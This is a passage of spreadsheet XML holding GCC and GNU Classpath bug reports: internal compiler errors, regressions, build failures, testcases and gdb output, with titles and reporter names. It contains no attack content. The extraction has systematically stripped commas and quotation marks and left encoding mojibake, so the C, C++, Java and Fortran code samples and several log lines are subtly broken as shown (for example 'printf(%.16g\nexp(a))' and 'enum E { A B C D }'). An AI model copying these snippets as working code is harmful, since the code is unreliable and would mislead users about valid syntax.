../src/math/ltiSecondOrderStatistics_template.h:368: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:368: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:368: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:368: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h: In member function â€˜void lti::secondOrderStatistics::covar2corrcoef(lti::matrix&amp;) const [with T = unsigned char U = float]â€™:
../src/math/ltiSecondOrderStatistics_template.h:831: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I tried to separate covar2corrcoef but that doesn't ICE. 
This does not ICE on trunk rev. 113884</t>
  </si>
  <si>
    <t>GCC-63567</t>
  </si>
  <si>
    <t>Linux kernel build error due to non-static initializers</t>
  </si>
  <si>
    <t>Hi all
I'm seeing a new build issue with the linux kernel:
  CC      kernel/smpboot.o
In file included from include/linux/mutex.h:15:0
                 from include/linux/kernfs.h:13
                 from include/linux/sysfs.h:15
                 from include/linux/kobject.h:21
                 from include/linux/device.h:17
                 from include/linux/node.h:17
                 from include/linux/cpu.h:16
                 from kernel/smpboot.c:4:
include/linux/spinlock_types.h:82:2: error: initializer element is not constant
  (spinlock_t ) __SPIN_LOCK_INITIALIZER(lockname)
  ^
include/linux/mutex.h:112:18: note: in expansion of macro â€˜__SPIN_LOCK_UNLOCKEDâ€™
    .wait_lock = __SPIN_LOCK_UNLOCKED(lockname.wait_lock) \
                  ^
include/linux/mutex.h:118:27: note: in expansion of macro â€˜__MUTEX_INITIALIZERâ€™
  struct mutex mutexname = __MUTEX_INITIALIZER(mutexname)
                           ^
kernel/smpboot.c:80:8: note: in expansion of macro â€˜DEFINE_MUTEXâ€™
 static DEFINE_MUTEX(smpboot_threads_lock)
        ^
include/linux/spinlock_types.h:82:2: note: (near initialization for â€˜smpboot_threads_lock.wait_lockâ€™)
  (spinlock_t ) __SPIN_LOCK_INITIALIZER(lockname)
  ^
include/linux/mutex.h:112:18: note: in expansion of macro â€˜__SPIN_LOCK_UNLOCKEDâ€™
    .wait_lock = __SPIN_LOCK_UNLOCKED(lockname.wait_lock) \
                  ^
include/linux/mutex.h:118:27: note: in expansion of macro â€˜__MUTEX_INITIALIZERâ€™
  struct mutex mutexname = __MUTEX_INITIALIZER(mutexname)
                           ^
kernel/smpboot.c:80:8: note: in expansion of macro â€˜DEFINE_MUTEXâ€™
 static DEFINE_MUTEX(smpboot_threads_lock)
        ^
make[1]: *** [kernel/smpboot.o] Error 1
make: *** [kernel/smpboot.o] Error 2
This was bisected down to:
commit b2601928b5bf34a817b5a9a2a371c476018e634d
Author: mpolacek 
Date:   Wed Oct 15 10:08:00 2014 +0000
        * doc/invoke.texi: Update to reflect that GNU11 is the default
        mode for C.
        * c-common.h (c_language_kind): Update comment.
    c-family/
        * c-opts.c (c_common_init_options): Make -std=gnu11 the default for C.
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@216247 138bc75d-0d04-0410-961f-82ee72b054a4</t>
  </si>
  <si>
    <t>sasha.levin</t>
  </si>
  <si>
    <t>GCC-35869</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in calc_dfs_tree at -O2 -gnatp after VRP optimization</t>
  </si>
  <si>
    <t>The to-be-attached Ada testcase exhibits a problem with the switch statement
optimization recently added to VRP:
	PR tree-optimization/14495
	PR tree-optimization/34793
	* tree-vrp.c (struct switch_update): New structure.
	(to_remove_edges to_update_switch_stmts): New VECs.
	(simplify_switch_using_ranges): New function.  Remove not taken
	case labels and edges.
	(simplify_stmt_using_ranges): Call it.
	(identify_jump_threads): Mark edges we have queued for removal
	so we don't thread them.
	(execute_vrp): Remove edges queued for removal update SWITCH_STMT
	case label vector.
	* tree-cfg.c (group_case_labels): Deal with missing default label.
	(tree_verify_flow_info): Allow missing default label.
	* stmt.c (emit_case_bit_tests): Deal with NULL default_label.
	(emit_case_nodes): Likewise.
	(expand_case): Do not rely on the default label to be present.
	* expr.c (try_casesi): Deal with NULL default_label.
	(do_tablejump): Likewise.
Quick analysis posted at
  http://gcc.gnu.org/ml/gcc-patches/2008-04/msg00558.html</t>
  </si>
  <si>
    <t>GCC-38384</t>
  </si>
  <si>
    <t>shared link/execute fails for cross gcc from linux to target hppa64-hp-hpux11.00</t>
  </si>
  <si>
    <t>fails with:
gmake[4]: Entering directory `/home/SCRATCH/tmp.eoeYZr5823/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/gcc-4.4.0-test/gcc-4.4.0-test/hppa64-hp-hpux11.00/libstdc++-v3/libmath'
/bin/sh ../libtool --tag CC --tag=CC --mode=compile /SCRATCH/tmp.eoeYZr5823/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/gcc-4.4.0-test/gcc-4.4.0-test/./gcc/xgcc -B/SCRATCH/tmp.eoeYZr5823/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/gcc-4.4.0-test/gcc-4.4.0-test/./gcc/ -B/opt/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/cross/HP-UX/hppa64-hp-hpux11.00/B.11.00/gcc-4.4.0-test/hppa64-hp-hpux11.00/bin/ -B/opt/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/cross/HP-UX/hppa64-hp-hpux11.00/B.11.00/gcc-4.4.0-test/hppa64-hp-hpux11.00/lib/ -isystem /opt/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/cross/HP-UX/hppa64-hp-hpux11.00/B.11.00/gcc-4.4.0-test/hppa64-hp-hpux11.00/include -isystem /opt/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/cross/HP-UX/hppa64-hp-hpux11.00/B.11.00/gcc-4.4.0-test/hppa64-hp-hpux11.00/sys-include -DHAVE_CONFIG_H -I. -I/opt/gnu/src/gcc/gcc-4.4.0-test/libstdc++-v3/libmath -I..     -g -O2   -c -o stubs.lo /opt/gnu/src/gcc/gcc-4.4.0-test/libstdc++-v3/libmath/stubs.c
libtool: compile:  /SCRATCH/tmp.eoeYZr5823/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/gcc-4.4.0-test/gcc-4.4.0-test/./gcc/xgcc -B/SCRATCH/tmp.eoeYZr5823/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/gcc-4.4.0-test/gcc-4.4.0-test/./gcc/ -B/opt/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/cross/HP-UX/hppa64-hp-hpux11.00/B.11.00/gcc-4.4.0-test/hppa64-hp-hpux11.00/bin/ -B/opt/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/cross/HP-UX/hppa64-hp-hpux11.00/B.11.00/gcc-4.4.0-test/hppa64-hp-hpux11.00/lib/ -isystem /opt/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/cross/HP-UX/hppa64-hp-hpux11.00/B.11.00/gcc-4.4.0-test/hppa64-hp-hpux11.00/include -isystem /opt/gnu/cross-gcc/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/cross/HP-UX/hppa64-hp-hpux11.00/B.11.00/gcc-4.4.0-test/hppa64-hp-hpux11.00/sys-include -DHAVE_CONFIG_H -I. -I/opt/gnu/src/gcc/gcc-4.4.0-test/libstdc++-v3/libmath -I.. -g -O2 -c /opt/gnu/src/gcc/gcc-4.4.0-test/libstdc++-v3/libmath/stubs.c  -DPIC -o .libs/stubs.o
/opt/gnu/src/gcc/gcc-4.4.0-test/libstdc++-v3/libmath/stubs.c:39: error: expected identifier or â€˜(â€™ before â€˜floatâ€™
/opt/gnu/src/gcc/gcc-4.4.0-test/libstdc++-v3/libmath/stubs.c:39: error: expected â€˜)â€™ before â€˜fabsâ€™
gmake[4]: *** [stubs.lo] Error 1
gmake[4]: Leaving directory `/home/SCRATCH/tmp.eoeYZr5823/Linux/x86_64-unknown-linux-gnu/openSUSE_10.3/gcc-4.4.0-test/gcc-4.4.0-test/hppa64-hp-hpux11.00/libstdc++-v3/libmath'
gmake[3]: *** [all-recursive] Error 1</t>
  </si>
  <si>
    <t>GCC-44932</t>
  </si>
  <si>
    <t>gcc.dg/uninit-pred-9_b.c fails</t>
  </si>
  <si>
    <t>Subject testcase fails on powerpc64.
FAIL: gcc.dg/uninit-pred-9_b.c bogus warning (test for bogus messages line 24)
Compiling standalone I see the following:
pthaugen/work&gt; ~/install/gcc/trunk/bin/gcc -O2 -S -m32 -Wuninitialized ~/src/gcc/trunk/gcc/gcc/testsuite/gcc.dg/uninit-pred-9_b.c
/home/pthaugen/src/gcc/trunk/gcc/gcc/testsuite/gcc.dg/uninit-pred-9_b.c: In function 'foo':
/home/pthaugen/src/gcc/trunk/gcc/gcc/testsuite/gcc.dg/uninit-pred-9_b.c:24:11: warning: 'v' may be used uninitialized in this function [-Wuninitialized]
/home/pthaugen/src/gcc/trunk/gcc/gcc/testsuite/gcc.dg/uninit-pred-9_b.c: In function 'foo_2':
/home/pthaugen/src/gcc/trunk/gcc/gcc/testsuite/gcc.dg/uninit-pred-9_b.c:41:11: warning: 'v' may be used uninitialized in this function [-Wuninitialized]</t>
  </si>
  <si>
    <t>CLASSPATH-23024</t>
  </si>
  <si>
    <t>JMenuItems cause infinite loop with MOUSE_MOVED events</t>
  </si>
  <si>
    <t>Run the testcase below (and attached).  Click on either File or Edit (just once don't deselect) and then move the mouse to hover over one of the frame buttons (minimize maximize exit).  
Expect: frame button becomes hilighted but no other visible action.
Result: infinite loop for mouse-moved event eventually leading to OutOfMemory error.
import javax.swing.*
class TestCase extends JFrame
{
  public static void main( String args[] )
  {
    JFrame jf = new JFrame()
    JMenuBar mb = new JMenuBar()
    JMenu menu = new JMenu(File)
    JMenu menu2 = new JMenu(Edit)
    mb.add(menu)
    mb.add(menu2) 
    jf.getContentPane().add(mb) 
    jf.setVisible(true)
  }
}</t>
  </si>
  <si>
    <t>GCC-43403</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in stage1 compiling __bswapdi2</t>
  </si>
  <si>
    <t>/home2/dave/gcc-4.5/objdir/./gcc/xgcc -B/home2/dave/gcc-4.5/objdir/./gcc/ -B/hom
e2/dave/opt/gnu/gcc/gcc-4.5.0/hppa-linux/bin/ -B/home2/dave/opt/gnu/gcc/gcc-4.5.
0/hppa-linux/lib/ -isystem /home2/dave/opt/gnu/gcc/gcc-4.5.0/hppa-linux/include
-isystem /home2/dave/opt/gnu/gcc/gcc-4.5.0/hppa-linux/sys-include    -g -O2 -O2
 -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmi
ssing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -DELF=1 -DLIN
UX=1 -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I..
/.././gcc -I../../../gcc/libgcc -I../../../gcc/libgcc/. -I../../../gcc/libgcc/..
/gcc -I../../../gcc/libgcc/../include  -DHAVE_CC_TLS -o _fixunsxfsi.o -MT _fixun
sxfsi.o -MD -MP -MF _fixunsxfsi.dep -DL_fixunsxfsi -c ../../../gcc/libgcc/../gcc
/libgcc2.c \
          -fvisibility=hidden -DHIDE_EXPORTS
../../../gcc/libgcc/../gcc/libgcc2.c: In function '__bswapdi2':
../../../gcc/libgcc/../gcc/libgcc2.c:513:1: internal compiler error: Segmentatio
n fault
Please submit a full bug report
Program received signal SIGSEGV Segmentation fault.
0x022d7790 in dv_uid (dv=0x3616ec8) at ../../gcc/gcc/var-tracking.c:1043
1043        return CSELIB_VAL_PTR (dv_as_value (dv))-&gt;uid
(gdb) by
Undefined command: by.  Try help.
(gdb) bt
#0  0x022d7790 in dv_uid (dv=0x3616ec8) at ../../gcc/gcc/var-tracking.c:1043
#1  0x022d7868 in dv_htab_hash (dv=0x3616ec8)
    at ../../gcc/gcc/var-tracking.c:1061
#2  0x022dd060 in add_value_chain (loc=0xfdf01e98 dvp=0x3616ed8)
    at ../../gcc/gcc/var-tracking.c:2745
...
(gdb) disass 0x022d7780 0x022d77a0
Dump of assembler code from 0x22d7780 to 0x22d77a0:
0x022d7780 : ldw -24(r3)r26
0x022d7784 : bl 0x22d74b4 rp
0x022d7788 : nop
0x022d778c : ldw 4(ret0)ret0
0x022d7790 : ldw 4(ret0)ret0
0x022d7794 : stw ret0c(r3)
0x022d7798 : bln 0x22d7814 r0
0x022d779c : ldw -24(r3)r26
End of assembler dump.
(gdb) p/x $ret0
$1 = 0x0</t>
  </si>
  <si>
    <t>GCC-21418</t>
  </si>
  <si>
    <t>Order of source files matters when compiling</t>
  </si>
  <si>
    <t>We occasionally get bug reports against GNU Classpath about strange compilation
errors. Kalle Olavi Niemitalo finally tracked it down. The order in which gcj -C
is given source files to compile. The smallest example given was:
gcj --bootclasspath '' --classpath .:vm/reference -C -d /tmp/obj
java/io/ObjectInputStream.java gnu/java/io/ClassLoaderObjectInputStream.java
gnu/java/rmi/server/RMIObjectInputStream.java
gnu/java/rmi/RMIMarshalledObjectInputStream.java
org/omg/CORBA/portable/InputStream.java
Which gives lots of errors like:
gnu/java/rmi/RMIMarshalledObjectInputStream.java:52: error: Class
'gnu.java.rmi.RMIMarshalledObjectInputStream' doesn't define the abstract method
'org.omg.CORBA.Object org.omg.CORBA.portable.InputStream.read_Object()' from
class 'org.omg.CORBA.portable.InputStream'. This method must be defined or class
'gnu.java.rmi.RMIMarshalledObjectInputStream' must be declared abstract.
   public class RMIMarshalledObjectInputStream extends RMIObjectInputStream
Obviously gcj somehow picked up the wrong InputStream class from the
org.omg.CORBA.portable package instead of the java.io package.
No compilation errors occur when changing the order of arguments to:
gcj --bootclasspath '' --classpath .:vm/reference -C -d /tmp/obj
org/omg/CORBA/portable/InputStream.java java/io/ObjectInputStream.java
gnu/java/io/ClassLoaderObjectInputStream.java
gnu/java/rmi/server/RMIObjectInputStream.java
gnu/java/rmi/RMIMarshalledObjectInputStream.java
This is with either a GNU Classpath 0.15 release or a CVS checkout done in the
top level directory.
Similar bahavior in 3.3 3.4 4.0 and 4.1 branches:
gcj (GCC) 3.3.5 (Debian 1:3.3.5-12) 
gcj-3.4 (GCC) 3.4.4 20050314 (prerelease) (Debian 3.4.3-12)
gcj (GCC) 4.0.1 20050505 (prerelease) 
gcj (GCC) 4.1.0 20050501 (experimental)
For GNU Classpath CVS I will workaround this issue by sorting the classes file
list. That way at least we will get uniform bug reports not depending on the
order in which find returns the source files.</t>
  </si>
  <si>
    <t>GCC-33700</t>
  </si>
  <si>
    <t>FAIL: 17_intro/headers/all_pedantic_errors.cc (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/./gcc/g++ -shared-libgcc -B/test/gnu/gcc
/objdir/./gcc -nostdinc++ -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v
3/src -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/src/.libs -B/opt/g
nu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/bin/ -B/opt/gnu64/gcc/gcc-4.3.0/hppa64-hp
-hpux11.11/lib/ -isystem /opt/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/include -i
system /opt/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/sys-include -g -O2 -D_GLIBCX
X_ASSERT -fmessage-length=0 -ffunction-sections -fdata-sections -g -O2 -g -O2
-DLOCALEDIR=. -nostdinc++ -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++
-v3/include/hppa64-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libst
dc++-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/test/gnu/gcc/gcc/l
ibstdc++-v3/include/backward -I/test/gnu/gcc/gcc/libstdc++-v3/testsuite/util /te
st/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/all_pedantic_errors.cc
-pedantic-errors -S  -o all_pedantic_errors.s    (timeout = 600)
In file included from /test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/incl
ude/ext/bitmap_allocator.h:43
                 from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/
all_pedantic_errors.cc:115:
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/concurrence.h:
158:30: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/concurrence.h:
281:29: error: use of C99 long long integer constant
In file included from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/
all_pedantic_errors.cc:126:
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:443:36: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:443:36: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:538:36: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:538:36: error: use of C99 long long integer constant
In file included from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/
all_pedantic_errors.cc:132:
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/rope:453:33: e
rror: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/rope:594:33: e
rror: use of C99 long long integer constant
compiler exited with status 1
output is:
In file included from /test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/incl
ude/ext/bitmap_allocator.h:43
                 from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/
all_pedantic_errors.cc:115:
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/concurrence.h:
158:30: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/concurrence.h:
281:29: error: use of C99 long long integer constant
In file included from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/
all_pedantic_errors.cc:126:
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:443:36: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:443:36: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:538:36: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:538:36: error: use of C99 long long integer constant
In file included from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/
all_pedantic_errors.cc:132:
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/rope:453:33: e
rror: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/rope:594:33: e
rror: use of C99 long long integer constant
FAIL: 17_intro/headers/all_pedantic_errors.cc (test for excess errors)
Excess errors:
In file included from /test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/incl
ude/ext/bitmap_allocator.h:43
                 from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/
all_pedantic_errors.cc:115:
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/concurrence.h:
158:30: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/concurrence.h:
281:29: error: use of C99 long long integer constant
In file included from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/
all_pedantic_errors.cc:126:
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:443:36: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:443:36: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:538:36: error: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/mt_allocator.h
:538:36: error: use of C99 long long integer constant
In file included from /test/gnu/gcc/gcc/libstdc++-v3/testsuite/17_intro/headers/
all_pedantic_errors.cc:132:
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/rope:453:33: e
rror: use of C99 long long integer constant
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/ext/rope:594:33: e
rror: use of C99 long long integer constant
extra_tool_flags are:
  -include bits/stdc++.h
#ifdef __LP64__
#define __MPOINTER              void    *m_ptr
#define __POINTER_SET           ((void *) 1LL)
#else
#define __MPOINTER              int     m_pad \
                                void    *m_ptr
#define __POINTER_SET           0 ((void *) 1L)
#endif
struct pthread_mutex {
        short           m_short[2]
        int             m_int
        int             m_int1[4]
                        __MPOINTER
        int             m_int2[2]
        int             m_int3[4]
        short           m_short2[2]
        int             m_int4[5]
        int             m_int5[2]
}
The problem seems to be the define for __POINTER_SET which uses a
long long constant.</t>
  </si>
  <si>
    <t>GCC-64831</t>
  </si>
  <si>
    <t>Preprocessing # operator with C++11 user-defined literal produces bad output</t>
  </si>
  <si>
    <t>$ cat t.cpp
#define S1(a) S2(a)
#define S2(a) #a
void foo()
{
  S1(bla_udl)
}
$ c++ t.cpp -E -P
void foo()
{
  \bla\_udl
}
$ c++ t.cpp -E -P -std=c++11
void foo()
{
  bla_udl
}
Feeding the resulting output from c++11 mode into the compiler gives an error:
$ c++ t.cpp -E -P  | c++ -c -xc++ -std=c++11 -
$ c++ t.cpp -E -P -std=c++11 | c++ -c -xc++ -std=c++11 -
: In function â€˜void foo()â€™:
:3:8: error: unable to find string literal operator â€˜operatorblaâ€™
This breaks https://github.com/icecc/icecream for remote compilation.</t>
  </si>
  <si>
    <t>holger.grund</t>
  </si>
  <si>
    <t>GCC-83548</t>
  </si>
  <si>
    <t>[6/7/8 Regression] Compilation Error using logical function in parameter</t>
  </si>
  <si>
    <t>The following reproducer:
program testit
    integer parameter :: nb_field_defi = 19
    logical(kind=1) parameter :: l_read_init(nb_field_defi) = &amp;
                                                (/logical(.true. 1)logical(.true. 1) logical(.true. 1) &amp;
                                                 logical(.false. 1)logical(.true. 1) logical(.true. 1) &amp;
                                                 logical(.true. 1) logical(.true. 1) logical(.true. 1) &amp;
                                                 logical(.false. 1)&amp;
                                                 logical(.true. 1) logical(.true. 1) logical(.true. 1) &amp;
                                                 logical(.false. 1)logical(.true. 1) &amp;
                                                 logical(.true. 1) logical(.true. 1) logical(.false. 1)&amp;
                                                 logical(.false. 1)/)
    do k=1nb_field_defi
       write(6*) ' l_read_init = 'kl_read_init(k)
    end do
end program testit
fails to compile with gfortran 6.3.0-1 and gfortran 5.4.0-6 (OK with gfortran 4.9.2-10)
&gt;gfortran  testit.f90
testit.f90:3:64:
                                                 (/logical(.true. 1)logical(.true. 1) logical(.true. 1) &amp;
                                                                1
Error: Integer expression required at (1)
additional information 
----------------------
change first affectation in parameter with .true._1 and it works !</t>
  </si>
  <si>
    <t>j-pierre.lefebvre</t>
  </si>
  <si>
    <t>GCC-8846</t>
  </si>
  <si>
    <t>[3.2 regression] ICE: locales and no match for operator&lt;&lt;/operator+</t>
  </si>
  <si>
    <t>8&lt;----------------------------
using namespace std
#include 
#include 
int main() {
  string foo = 
  cout &lt;&lt; foo + 0.0 &lt;&lt; endl
}
8&lt;----------------------------
with fr_FR@euro locale no match for operator&lt;&lt; and ICE (erreur interne de compilateur: erreur pour rapporter une routine rÃ©-entÃ©e French version for Internal compiler error: Error reporting routines re-entered.)
with C locale no match for `std::string&amp; + double' operator
$ diff toto.fr_FR\@euro.ii toto.C.ii 
23c23
---
&gt; # 1 
&gt; # 1 
Release:
3.2.1
Environment:
i686-pc-linux-gnu
Debian GNU/Linux Sarge
configure --enable-threads=posix --enable-long-long --enable-namespaces --enable-multilib --with-as=binutils-2.13.1 --with-ld=binutils-2.13.1
--enable-nls --with-included-gettext
How-To-Repeat:
$ LC_ALL=C g++ -c toto.cpp
=&gt; 1 error
$ LC_ALL=fr_FR@euro g++ -c toto.cpp
=&gt; 1 error and ICE</t>
  </si>
  <si>
    <t>benoit.sibaud</t>
  </si>
  <si>
    <t>GCC-57050</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/pr56982.c compilation  -O0</t>
  </si>
  <si>
    <t>The new testcase gcc.c-torture/execute/pr56982.c fails to compile on arm-none-eabi configured with newlib. 
Missing effective target?
$ /work/apr-builds/tmp/install/bin/arm-none-eabi-gcc -S /work/local-checkouts/gcc-git/gcc/testsuite/gcc.c-torture/execute/pr56982.c -O2 
/work/local-checkouts/gcc-git/gcc/testsuite/gcc.c-torture/execute/pr56982.c:4:1: error: unknown type name 'sigjmp_buf'
 static sigjmp_buf env
 ^
Configured with: /work/local-checkouts/gcc-git//configure --target=arm-none-eabi  --with-newlib --with-gnu-as --with-gnu-ld --enable-languages=cc++ --disable-shared --disable-nls --disable-threads --disable-lto --disable-plugin --disable-tls --enable-checking=yes --disable-libssp --disable-libgomp --disable-libmudflap --with-cpu=cortex-a15 --with-fpu=neon-vfpv4 --with-float=softfp 
Thread model: single
gcc version 4.9.0 20130423 (experimental) (GCC) 
Thanks
Greta</t>
  </si>
  <si>
    <t>GCC-2146</t>
  </si>
  <si>
    <t>Invalid optimization for the exponential function</t>
  </si>
  <si>
    <t>GCC optimizes the computation of the exponential
of a constant by replacing the call to the function
provided by the mathematical library by some assembler
instructions to compute it directly.
Without any optimization the result of exp(-Inf) is correctly
0 but becomes nan whenever one uses the -O1 option or above.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-12 on an i686
Environment variables have their default values under this
O.S.
How-To-Repeat:
#include 
#include 
int
main()
{
  double a= -1.0/0.0
  printf(%.16g\nexp(a))
}</t>
  </si>
  <si>
    <t>frederic.goualard</t>
  </si>
  <si>
    <t>GCC-21652</t>
  </si>
  <si>
    <t>[4.1 Regression] g++.dg/other/static11.C fails</t>
  </si>
  <si>
    <t>FAIL: g++.dg/other/static11.C (test for excess errors)
appeared on mainline multiple platforms between 20050517 and 20050518.  Logs
on i686-pc-linux-gnu:
/home/gcc/nightlies/src-mainline-2005-05-18/gcc-mainline-2005-05-18/gcc/testsuite/g++.dg/other/static11.C:
In function '(static destructors for
/home/gcc/nightlies/src-mainline-2005-05-18/gcc-mainline-2005-05-18/gcc/testsuite/g++.dg/other/static11.C)':
/home/gcc/nightlies/src-mainline-2005-05-18/gcc-mainline-2005-05-18/gcc/testsuite/g++.dg/other/static11.C:34:
internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-43680</t>
  </si>
  <si>
    <t>[DR 1022] G++ is too aggressive in optimizing away bounds checking with enums</t>
  </si>
  <si>
    <t>With -O2 this testcase aborts on x86_64:
extern C void abort ()
enum E { A B C D }
void
CheckE(const E value)
{
  long v = value
  if (v &lt;= D)
    abort ()
}
int main() {
  CheckE(static_cast(5))
}
Presumably something in the middle- or back-end is believing what the C++ front end sets TYPE_MAX_VALUE to and optimizing based on the assumption that value cannot be greater than 3.
I think the C++ standard can definitely be read to allow this optimization but it means optimizing away bounds checking which is a serious security problem.  The standard should be fixed.</t>
  </si>
  <si>
    <t>GCC-35723</t>
  </si>
  <si>
    <t>Can't use run-time array element in character declaration</t>
  </si>
  <si>
    <t>The following program gives an error message for valid use of
an array element in an expression for an automatic character
array.  
The error message is repeated twice.
Changing from a run-time subscript in the parameter array to a
constant fixes the problem.
Dick Hendrickson
      program try_vf0016
! fails on Windows XP
! gcc version 4.4.0 20080312 (experimental) [trunk revision 133139]
! syntax error for valid syntax
      call       vf0016(  1  2  3)
      end
      SUBROUTINE VF0016(nf1nf2nf3)
      CHARACTER(LEN=9KIND=1)DIMENSION(3) PARAMETER
     $     ::  TEST_STRINGS =
     $  (/'       HI''ABC      ''  CDEFG  '/)
      CHARACTER :: TEST_ARRAY
     $(LEN_TRIM(ADJUSTL(TEST_STRINGS(nf1)))  ! changing nf1 to 1 fixes it
     $ SUM(LEN_TRIM(ADJUSTL(TEST_STRINGS)))
     $ LEN_TRIM(ADJUSTL(ADJUSTR(TEST_STRINGS(3))))
     $ SUM(LEN_TRIM(ADJUSTL(ADJUSTR(TEST_STRINGS(NF1:NF3:NF2)))))   )
       print * 2 10 5 7
       print * shape (test_array)
         end
C:\g_experiments\gfortran&gt;gfortran vf0016.f
vf0016.f:14.24:
     $(LEN_TRIM(ADJUSTL(TEST_STRINGS(nf1)))  ! changing nf1 to 1 fixes
                       1
Error: Variable 'test_strings' cannot appear in the expression at (1)
vf0016.f:14.24:
     $(LEN_TRIM(ADJUSTL(TEST_STRINGS(nf1)))  ! changing nf1 to 1 fixes
                       1
Error: Variable 'test_strings' cannot appear in the expression at (1)</t>
  </si>
  <si>
    <t>GCC-28672</t>
  </si>
  <si>
    <t>[4.2 Regression]: Gcc went into infinite loop when building libstdc++</t>
  </si>
  <si>
    <t>With revision 116045 gcc mainline went into infinite loop when compiling
libstdc++-v3/src/wlocale-inst.cc.</t>
